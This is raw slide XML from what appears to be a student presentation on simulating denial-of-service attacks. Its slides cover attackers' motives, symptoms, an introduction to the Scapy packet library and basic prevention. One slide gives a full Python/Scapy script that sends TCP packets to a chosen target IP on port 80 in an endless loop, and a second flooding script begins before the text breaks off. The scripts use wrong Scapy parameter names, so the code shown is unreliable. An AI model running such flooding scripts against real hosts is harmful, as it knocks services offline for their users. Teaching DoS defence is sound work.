          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
      </pc:sldMasterChg>
      <pc:sldMasterChg chg="add del addSldLayout delSldLayout modSldLayout">
        <pc:chgData name="ADITYA GUPTA" userId="S::aditya.mohan@students.iiit.ac.in::65949f6f-4f7a-4550-99b5-a243a20fdbd3" providerId="AD" clId="Web-{0F3BD3C6-5DB1-791C-B09E-722FF625A0F8}" dt="2020-03-21T08:11:38.630" v="64"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="3728804554" sldId="2147483672"/>
        </pc:sldMasterMkLst>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1832544298" sldId="2147483673"/>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666760195" sldId="2147483674"/>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3868246911" sldId="2147483675"/>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1124366965" sldId="2147483676"/>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768380248" sldId="2147483677"/>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967677475" sldId="2147483678"/>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68844663" sldId="2147483679"/>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1355118002" sldId="2147483680"/>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3390218564" sldId="2147483681"/>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2553152009" sldId="2147483682"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="add del mod replId">
          <pc:chgData name="ADITYA GUPTA" userId="S::aditya.mohan@students.iiit.ac.in::65949f6f-4f7a-4550-99b5-a243a20fdbd3" providerId="AD" clId="Web-{0F3BD3C6-5DB1-791C-B09E-722FF625A0F8}" dt="2020-03-21T08:11:38.630" v="64"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="3728804554" sldId="2147483672"/>
            <pc:sldLayoutMk cId="1373751882" sldId="2147483683"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
      </pc:sldMasterChg>
      <pc:sldMasterChg chg="add addSldLayout modSldLayout">
        <pc:chgData name="ADITYA GUPTA" userId="S::aditya.mohan@students.iiit.ac.in::65949f6f-4f7a-4550-99b5-a243a20fdbd3" providerId="AD" clId="Web-{0F3BD3C6-5DB1-791C-B09E-722FF625A0F8}" dt="2020-03-21T08:11:38.630" v="64"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="2538525920" sldId="2147483684"/>
        </pc:sldMasterMkLst>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1672012721" sldId="2147483685"/>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35896709" sldId="2147483686"/>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3626979627" sldId="2147483687"/>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2859901863" sldId="2147483688"/>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1593678233" sldId="2147483689"/>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3734674315" sldId="2147483690"/>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1034376949" sldId="2147483691"/>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2548373314" sldId="2147483692"/>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974632528" sldId="2147483693"/>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255405002" sldId="2147483694"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="add mod replId">
          <pc:chgData name="ADITYA GUPTA" userId="S::aditya.mohan@students.iiit.ac.in::65949f6f-4f7a-4550-99b5-a243a20fdbd3" providerId="AD" clId="Web-{0F3BD3C6-5DB1-791C-B09E-722FF625A0F8}" dt="2020-03-21T08:11:38.630" v="64"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2538525920" sldId="2147483684"/>
            <pc:sldLayoutMk cId="1089668384"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20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40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96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9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990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36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467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437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837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463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385259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009" y="2163329"/>
            <a:ext cx="11305554" cy="2601002"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8800" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Simulation of DoS  Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F03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8B32-4D7F-49AF-A4B6-52D137461038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Reasons behind this attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CE786E7-1757-4FDC-A4EB-F9B6EE563932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Hactivism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Attack for ransom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Targeted attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Pure boredom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78587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8B32-4D7F-49AF-A4B6-52D137461038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="477299"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Prevention</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CE786E7-1757-4FDC-A4EB-F9B6EE563932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1034871"/>
            <a:ext cx="10515600" cy="5400884"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Given that Denial of Service (DoS) attacks are becoming more frequent, it is a good time to review the basics and how we can fight back.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Rate Limiting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>IP whitelisting/blacklisting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> – This is the simplest and least effective method. Generally someone writes some Python scripts that try to filter out the bad traffic or an enterprise will try and use its existing firewalls to block the traffic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Internet Service Provider (ISP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> – Some enterprises use their ISP to provide DDoS mitigation. These ISP’s have more bandwidth than an enterprise would, which can help with the large volumetric attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143887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D13-1DA3-4294-AB6E-F39EEB97FF0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Contents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D1EB64F-4DEC-4F08-A45E-59DA73654BC0}"/>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Signs and Symptoms of a DoS Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Introduction to Scapy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Simulation of DoS Attacks in Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Reasons behind DoS Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Prevention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354631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2D06-99F7-42AE-A55B-41485E0D735C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Signs and Symptoms </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F2DD0E-794B-43B6-883E-9A13314A33F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ineffective services</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Inaccessible services</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Interruption of network traffic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Connection interference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The website is responding slowly.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The website is unresponsive.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The user has problems accessing the website.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Internet connection issues if you are a target.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182159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a:xfrm>
            <a:off x="824345" y="296636"/>
            <a:ext cx="10515600" cy="1169242"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Scapy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p: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727363" y="1580688"/>
            <a:ext cx="10515600" cy="5372130"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Scapy is a powerful interactive packet manipulation program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Enable to send, sniff, forge and dissect network packets.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Can manipulate and process packets at every layer of TCP/IP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Supports wide range of protocols.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Interactive shell or python module.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48161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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Simulation of basic DoS Attack in Python</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p: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dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DoS attack can be implemented at the data link, network or application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>layer(Effects at each layer are discussed later).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Considering different methods : </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Single IP single port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Single IP multiple port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Multiple IP single port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Multiplt IP Multiple port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88374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Single IP Single port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1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A large number of packets are sent to web server by using single IP and from single port number. It is a low-level attack which is used to check the behavior of the web server. Its implementation in Python can be done with the help of Scapy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>from scapy.all import *</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>source_IP = input("Enter Source IP :  ")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>target_IP = input("Enter Target IP :  ")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>source_port = int(input("Enter Source Port Number:"))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i = 1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>while True:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   IP1 = IP(source_IP = source_IP, destination = target_IP)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   TCP1 = TCP(srcport = source_port, dstport = 80)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   pkt = IP1 / TCP1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   send(pkt, inter = .001)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   print ("packet sent ", i)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      i = i + 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137927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Single IP multiple port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4976031" y="963877"/>
            <a:ext cx="6377769" cy="4930246"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A large number of packets are sent to web server by using single IP and from multiple ports. Its implementation in Python can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>done with the help of Scapy. The following python script will help implement Single IP multiple port DoS attack −</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    from scapy.all import *
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    source_IP = input("Enter IP address of Source: ")</a:t>
            </a:r>
            <a:r>
